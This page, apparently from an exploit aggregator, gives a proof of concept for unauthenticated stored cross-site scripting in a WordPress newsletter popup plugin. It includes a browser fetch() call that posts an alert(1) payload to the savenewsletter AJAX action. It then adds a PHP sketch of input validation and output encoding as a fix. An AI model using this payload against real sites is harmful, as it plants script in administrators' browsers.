## https://sploitus.com/exploit?id=WPEX-ID:FED1E184-FF56-44FE-9876-D17C0156447A
1. Create a Newsletter popup (any will do) and publish it.

2. Use an incognito window and open the website involved, then run the following code in the browser console (change URL accordingly):

   ```js
   fetch('http://localhost/wp-admin/admin-ajax.php', {
     method: 'POST',
     headers: new Headers({
       'Content-Type': 'application/x-www-form-urlencoded',
     }),
     body: 'action=savenewsletter&nlid=1&nlname=Test&nldata=EMAIL%3Dalert(1)'
   })
     .then(response => response.text())
     .then(result => console.log(result))
     .catch(error => console.log('error', error));
   ```

3. In the WP-Admin dashboard, go to Newsletter Popup -> Local Record and click on Show Record.

4. The alert will trigger successfully.
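
The steps above show a value accepted by the `savenewsletter` action without a logged-in session and later written into the Local Record admin view unencoded. As an added example (not the plugin's or the advisory's code; the function names `nl_parse_record` and `nl_render_row` and the sample records are assumptions), this plain-PHP sketch validates the `nldata` fields on save and encodes them on output:

```php
<?php
// Added example: hypothetical helpers, not the plugin's own code.

// Validate a submitted nldata string ("EMAIL=...&NAME=...") before storing it.
function nl_parse_record(string $nldata): array
{
    $clean = [];
    foreach (explode('&', $nldata) as $pair) {
        // Split on the first "=" only; a missing value becomes an empty string.
        [$key, $value] = array_pad(explode('=', $pair, 2), 2, '');
        if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $key)) {
            continue;                          // drop empty or unexpected keys
        }
        $value = trim($value);
        if (strlen($value) > 254) {
            throw new InvalidArgumentException("$key is too long");
        }
        if (strtoupper($key) === 'EMAIL'
            && filter_var($value, FILTER_VALIDATE_EMAIL) === false) {
            throw new InvalidArgumentException('EMAIL is not a valid address');
        }
        $clean[$key] = $value;
    }
    return $clean;
}

// Render one stored record for the admin view, encoding every key and value.
function nl_render_row(array $record): string
{
    $cells = '';
    foreach ($record as $key => $value) {
        $cells .= '<td>' . htmlspecialchars((string) $key, ENT_QUOTES, 'UTF-8')
                . ': ' . htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8') . '</td>';
    }
    return '<tr>' . $cells . '</tr>';
}

// Constructed inputs: a well-formed address, then the value the PoC submits.
foreach (['EMAIL=user@example.com', 'EMAIL=alert(1)'] as $raw) {
    try {
        echo nl_render_row(nl_parse_record($raw)), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}

// Rows saved before a fix may still hold markup, so output encoding stays on.
echo nl_render_row(['EMAIL' => '<b>stored earlier</b>']), "\n";
```

Inside a WordPress plugin the same roles are played by `sanitize_email()` and `sanitize_text_field()` on save, `esc_html()` on output, and `check_ajax_referer()` on the AJAX action.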